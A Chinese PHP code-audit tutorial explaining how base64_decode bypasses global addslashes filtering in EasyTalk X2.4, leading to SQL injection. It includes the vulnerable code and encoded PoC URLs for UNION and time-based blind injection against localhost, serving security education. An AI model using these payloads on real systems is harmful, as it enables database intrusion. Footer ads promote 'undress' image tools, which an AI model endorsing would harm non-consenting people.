【PHP代码审计实例教程】SQL注入-3.全局防护Bypass之Base64Decode-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

【PHP代码审计实例教程】SQL注入-3.全局防护Bypass之Base64Decode

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 20, 2016 pm 12:35 PM

0x01 背景

现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。同上一篇，我们需要找一些编码解码的函数来绕过全局防护，本篇介绍base64decode()的情况。

漏洞来源于乌云： http://www.wooyun.org/bugs/wooyun-2014-050338

0x02 环境搭建

看背景我们使用了低版本的easytalk程序，版本为X2.4

①源码我打包了一份： http://pan.baidu.com/s/1bopOFNL

②解压到www的easytalk目录下，按照提示一步步安装即可，遇到问题自行百度或谷歌，成功后访问如下图：

0x03 漏洞分析

首先看下源码结构，用的ThinkPHP框架，比较复杂：

有兴趣的可以去研究下再继续往下看，新手可以知道ThinkPHP对接收的参数是有过滤的，并且根据你服务器是否开启GPC会做相应的处理：

1./ThinkPHP/Extend/Library/ORG/Util/Input.class.php文件第266行:

/** +---------------------------------------------------------- * 如果 magic_quotes_gpc 为关闭状态，这个函数可以转义字符串 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */static public function addSlashes($string) {    if (!get_magic_quotes_gpc()) {        $string = addslashes($string);    }    return $string;}

2.使用Seay代码审计系统的全局搜索功能，搜索包含关键字为”base64_decode”的文件，发现SettingAction.class.php包含一个对接收的参数auth进行base64_decode的地方：

3.我们跟进这个php文件，发现虽然使用daddslashes函数进行了注入过滤，但是使用了base64_decode函数对参数auth进行了转码从而可以绕过过滤造成注入：

//认证电子邮件public function doauth() {    $_authmsg=daddslashes($_GET['auth']);//再次判断GPC是否开启并进行注入过滤    $authmsg=base64_decode($_authmsg);//base64_decode函数对参数进行转码处理    $tem=explode(":",$authmsg);//对解码后的参数authmsg按照“：”进行分割存入数组tem中    $send_id=$tem[0];    $user=M('Users');    $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();//带入查询，在where子句里，造成注入    if ($_authmsg==$row['auth_email']) {        $user->where("user_id='$send_id'")->setField('auth_email',1);        setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/');    } else {        setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/');    }    header('location:'.SITE_URL.'/?m=setting&a=mailauth');}

0x04 漏洞证明

构造获取数据库相关信息的POC：

http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==

查看sql语句发现成功执行：

发现这里是一个盲注，并没有输出，所以我们使用sql盲注的语句。获取当前数据库用户名的第一个字符是不是‘r’（ascii值为114）的POC：

http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksMSwxKSkgPSAxMTQpLHNsZWVwKDUpLDApKSM=

页面持续了5秒，说明user()的第一个字符为‘r’，查看sql语句发现成功执行：

最后，有兴趣的同学可以自己写个py脚本来跑这种盲注。

原文地址：

http://www.cnbraid.com/2016/02/18/sql2/

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

PHP Performance Tuning for High Traffic WebsitesMay 14, 2025 am 12:13 AM

ThesecrettokeepingaPHP-poweredwebsiterunningsmoothlyunderheavyloadinvolvesseveralkeystrategies:1)ImplementopcodecachingwithOPcachetoreducescriptexecutiontime,2)UsedatabasequerycachingwithRedistolessendatabaseload,3)LeverageCDNslikeCloudflareforservin

Dependency Injection in PHP: Code Examples for BeginnersMay 14, 2025 am 12:08 AM

You should care about DependencyInjection(DI) because it makes your code clearer and easier to maintain. 1) DI makes it more modular by decoupling classes, 2) improves the convenience of testing and code flexibility, 3) Use DI containers to manage complex dependencies, but pay attention to performance impact and circular dependencies, 4) The best practice is to rely on abstract interfaces to achieve loose coupling.

PHP Performance: is it possible to optimize the application?May 14, 2025 am 12:04 AM

Yes,optimizingaPHPapplicationispossibleandessential.1)ImplementcachingusingAPCutoreducedatabaseload.2)Optimizedatabaseswithindexing,efficientqueries,andconnectionpooling.3)Enhancecodewithbuilt-infunctions,avoidingglobalvariables,andusingopcodecaching

PHP Performance Optimization: The Ultimate GuideMay 14, 2025 am 12:02 AM

ThekeystrategiestosignificantlyboostPHPapplicationperformanceare:1)UseopcodecachinglikeOPcachetoreduceexecutiontime,2)Optimizedatabaseinteractionswithpreparedstatementsandproperindexing,3)ConfigurewebserverslikeNginxwithPHP-FPMforbetterperformance,4)

PHP Dependency Injection Container: A Quick StartMay 13, 2025 am 12:11 AM

APHPDependencyInjectionContainerisatoolthatmanagesclassdependencies,enhancingcodemodularity,testability,andmaintainability.Itactsasacentralhubforcreatingandinjectingdependencies,thusreducingtightcouplingandeasingunittesting.

Dependency Injection vs. Service Locator in PHPMay 13, 2025 am 12:10 AM

Select DependencyInjection (DI) for large applications, ServiceLocator is suitable for small projects or prototypes. 1) DI improves the testability and modularity of the code through constructor injection. 2) ServiceLocator obtains services through center registration, which is convenient but may lead to an increase in code coupling.

PHP performance optimization strategies.May 13, 2025 am 12:06 AM

PHPapplicationscanbeoptimizedforspeedandefficiencyby:1)enablingopcacheinphp.ini,2)usingpreparedstatementswithPDOfordatabasequeries,3)replacingloopswitharray_filterandarray_mapfordataprocessing,4)configuringNginxasareverseproxy,5)implementingcachingwi

PHP Email Validation: Ensuring Emails Are Sent CorrectlyMay 13, 2025 am 12:06 AM

PHPemailvalidationinvolvesthreesteps:1)Formatvalidationusingregularexpressionstochecktheemailformat;2)DNSvalidationtoensurethedomainhasavalidMXrecord;3)SMTPvalidation,themostthoroughmethod,whichchecksifthemailboxexistsbyconnectingtotheSMTPserver.Impl

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055612 fails to install in Windows 10?

4 weeks agoByDDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Roblox: Grow A Garden - Complete Mutation Guide

3 weeks agoByDDD

Nordhold: Fusion System, Explained

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Mandragora: Whispers Of The Witch Tree - How To Unlock The Grappling Hook

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

SublimeText3 Chinese version

Chinese version, very easy to use

VSCode Windows 64-bit Download

A free and powerful IDE editor launched by Microsoft

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.